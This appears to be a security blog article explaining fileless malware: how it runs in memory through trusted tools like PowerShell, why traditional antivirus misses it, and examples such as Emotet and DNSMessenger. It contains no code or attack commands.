Fileless attacks are becoming more and more prevalent. The Ponemon Institute estimate that 35% of all attacks during 2018 were fileless. And more importantly, they conclude that fileless attacks are 10 times more likely to succeed than any other form of attack. The reason for this haunting reality is simple: traditional anti-virus protection relies on file scanning, and with these attacks, no files are stored on the hard drive. Another reason for the popularity of this specter is that they leave no footprint, making forensics after the event difficult. The inclusion of fileless methods in many exploit kits contributes to their prevalence.
Fileless attacks operate in memory and their ghostly payload is not stored in a file on the hard drive. The concept is not new, but similar to what in the early days was known as memory-resident viruses. The first memory-resident was the Lehigh virus which appeared in 1987. Much later the technique became known as AVTs (Advanced Volatile Threats). Other terms include non-malware attack or a memory-based attack.
Malware generally performs a number of different functions – such as payload execution, data exfiltration, communication with its command and control server, lateral movement across the network, persistence, etc. The term fileless malware refers to attacks that have at least some (but not necessarily all) of these functions fileless (particularly payload execution). An Office macro for example, can trigger a fileless attack. Microsoft classifies three types of fileless attacks based on their degree of filelessness:
Type I: No file activity at all
Type II: No files written to disk, but some files are used indirectly.
Type III: Files required to achieve fileless persistence.
Fileless attacks leverage legitimate, trusted applications already on the system. Most employ PowerShell, the tool used by IT Administrators for automating tasks and configuration management. McAfee found a 435% annual increase in malicious PowerShell activity. PowerShell is often harnessed to move laterally from machine to machine within an organization. VMI (Windows Management Instrumentation) is also used.
The ghost is detectable, albeit very difficult to do so – however without storing files on the hard drive, typically these attacks evade detection from traditional AV solutions. Forensics need to be performed on RAM memory, which is difficult. The malware needs to be caught red-handed, in real time, while it is still in operation. After a reboot, like a ghost, most, if not all traces of the attack disappear. Monitoring botnet server connection, data exfiltration from the network, and monitoring PowerShell activities are ways of being alerted to a fileless malware attack.
The specter of fileless attacks has appeared in examples such as:
• Emotet, which targets banks, starting from an Office macro which launches PowerShell scripts;
• CactusTorch, which uses the DotNetToJScript technique to execute .NET assemblies from memory;
• August, which arrived in an Office macro and used PowerShell to load its payload into memory;
• DNSMessenger, which originated in an Office macro and used DNS queries to implement malicious PowerShell commands;
• Duqu2, a form of fileless attack as it removed the installer file after the malware was installed in memory.
The Equifax 2018 data breach was executed by a fileless attack utilizing the Apache Struts application.
Fileless metods are typically employed to steal data, however they have also been used for cryptomining and for ransomware attacks.
A few AV products, such as Microsoft’s Defender, are beginning to include some memory scanning, enabling them to catch some fileless attacks if they repackage known, existing techniques (such as that used by the Sharpshooter for example).
However, currently, fileless attacks have largely caught traditional defence methods napping. These difficult-to-trace attacks are effective and bound to become even more prevalent. Only next generation solutions can help secure against this ghost in the machine.